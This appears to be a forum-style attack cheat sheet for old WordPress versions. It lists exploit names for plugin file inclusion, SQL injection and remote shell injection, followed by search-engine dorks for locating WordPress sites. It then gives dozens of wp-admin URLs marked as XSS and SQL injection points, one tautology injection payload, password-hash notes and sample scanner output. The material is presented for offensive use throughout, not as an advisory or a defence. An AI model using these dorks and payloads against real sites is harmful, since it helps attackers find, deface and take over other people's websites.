Vulnerabilities:
Wordpress Multiple Versions Pwnpress Exploitation Toolkit (0.2pub)
Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability
Enigma 2 WordPress Bridge (boarddir) Remote File Include Vulnerability
1.4*
Wordpress plugin wordTube <= 1.43 (wpPATH) RFI Vulnerability
Wordpress plugin wp-Table <= 1.43 (inc_dir) RFI Vulnerability
Wordpress Plugin myGallery <= 1.4b4 Remote File Inclusion Vulnerability
1.5.1.*
Wordpress <= 1.5.1.3 Remote Code Execution eXploit (****sploit)
Wordpress <= 1.5.1.3 Remote Code Execution 0-Day Exploit
Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit
WordPress <= 1.5.1.1 SQL Injection Exploit
WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit
2.0.*
WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit
Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit
Wordpress 2.0.5 Trackback UTF-7 Remote SQL Injection Exploit
2.1.*
Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit
Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit
2.*
Wordpress <= 2.x dictionary & Bruteforce attack
WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit
Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit
Dorks:
Code:
"is proudly powered by WordPress"
intext:"Warning: main" inurl:Wp ext:php
inurl:wp-login.php Register Username Password -echo -trac
inurl:"wp-admin" config -cvs -phpxref
inurl:/comments/feed/rss2/ intext:wordpress.org?v=*
Powered by Wordpress 1.2
intext:"proudly powered by WordPress" filetype:php
intext:"powered by WordPress" filetype:php -dritte-seite
intitle:"WordPress > * > Login form" inurl:"wp-login.php"
ext:php inurl:"wp-login.php" -cvs
Full path disclosure:
WordPress < 1.5.2
Cross-site Scripting:
/wp-login.php?action=login&redirect_to=[XSS]
/wp-admin/templates.php?file=[XSS]
/wp-admin/post.php?content=[XSS]
http://www.example.com/wp-admin/edit-comments.php?s=[XSS]
http://www.example.com/wp-admin/edit-comments.php?s=bla&submit=Search&mode=[XSS]
http://www.example.com/wp-admin/templates.php?file=[XSS]
http://www.example.com/wp-admin/link-add.php?linkurl=[XSS]
http://www.example.com/wp-admin/link-add.php?name=[XSS]
http://www.example.com/wp-admin/link-categories.php?cat_id=[XSS]&action=Edit
http://www.example.com/wp-admin/link-manager.php?order_by=[XSS]
http://www.example.com/wp-admin/link-manager.php?cat_id=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_url=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_name=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_description=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rel=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_image=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rss_uri=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_notes=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_id=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&order_by=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&cat_id=[XSS]
http://www.example.com/wp-admin/post.php?content=[XSS]
http://www.example.com/wp-admin/moderation.php?action=update&item_approved=[XSS]
SQL injection examples:
http://www.example.com/index.php?m=[SQL]
http://www.example.com/wp-admin/edit.php?m=[SQL]
http://www.example.com/wp-admin/link-categories.php?cat_id=[SQL]&action=Edit
http://www.example.com/index.php?cat=100) or 0=0 or (0=1
Tables/Prefix_/Columns:
wp_
Hash algorithms:
md5(password)
WordPress Vulnerability Scanner
Code:
$ perl -x wp-scanner.pl http://testblog/wordpress/
WordPress Scanner starting: David Kierznowski (Michael Daw - On Security)
Using plugins dir: wp-content/plugins
[*] Initial WordPress Enumeration
[*] Finding WordPress Major Version
[*] Testing WordPress Template for XSS
WordPress Basic Results
wp-commentsrss2.php => Version Leak: WordPress 2.1.3
wp-links-opml.php => Version Leak: WordPress 2.1.3
wp-major-ver => Version 2.1
wp-rdf.php => Version Leak: WordPress 2.1.3
wp-rss.php => Version Leak: WordPress 2.1.3
wp-rss2.php => Version Leak: WordPress 2.1.3
wp-server => Apache/1.3.34 (Unix) PHP/4.4.4 mod_ssl/2.8.25 OpenSSL/0.9.8a
wp-style-dir => http://testblog/wordpress/wp-content/themes/time1-theme-10/style.css
wp-title => Test Blog
wp-version => WordPress 2.1.3
x-Pingback => http://testblog/wordpress/xmlrpc.php
WordPress Plugins Found
wp-plugins[0] => Akismet